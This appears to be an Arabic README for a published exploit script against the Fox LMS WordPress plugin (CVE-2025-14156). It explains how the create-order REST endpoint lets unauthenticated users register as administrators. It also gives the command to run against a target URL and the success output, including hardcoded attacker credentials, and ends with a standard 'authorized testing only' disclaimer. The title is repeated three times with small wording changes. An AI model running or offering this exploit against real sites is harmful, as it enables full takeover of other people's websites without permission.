
Fox LMS – إضافة LMS لووردبريس 1.0.4.7 - 1.0.5.1 - تصعيد صلاحيات بدون مصادقة عبر 'createOrder'
Fox LMS – إضافة LMS لووردبريس 1.0.4.7 - 1.0.5.1 - تصعيد امتيازات دون مصادقة عبر 'createOrder'
Fox LMS – إضافة LMS لووردبريس (من v1.0.4.7 إلى v1.0.5.1) – تصعيد امتيازات دون مصادقة عبر createOrder
جميع الإصدارات حتى 1.0.5.1 من Fox LMS لووردبريس معرّضة لتصعيد الامتيازات. لا تتحقق نقطة نهاية REST API /fox-lms/v1/payments/create-order بشكل صحيح من معامل 'role' عند إنشاء مستخدمين جدد، مما يسمح للمهاجمين غير المصادقين بإنشاء حسابات بأدوار عشوائية، بما في ذلك دور المسؤول.
CVE: CVE-2025-14156
درجة CVSS: 9.8 (حرجة)
الخطر: اختراق كامل للموقع.
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
عند نجاح الاستغلال، سيُخرج السكربت فقط:
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
إذا فشل الاستغلال، ستظهر رسالة خطأ مختصرة فقط.
'administrator'.هذه الأداة مخصصة للأغراض التعليمية ولاختبارات الاختراق المصرح بها فقط. أي استخدام غير مصرح به ضد الأنظمة دون إذن صريح يعد غير قانوني. المؤلف غير مسؤول عن سوء الاستخدام أو الأضرار أو العواقب القانونية الناتجة عن استخدام هذا السكربت. التزم دائمًا بممارسات الإفصاح المسؤول وتأكد من حصولك على إذن كتابي قبل اختبار أي هدف.
Telegram: @Nxploited
Github: Nxploited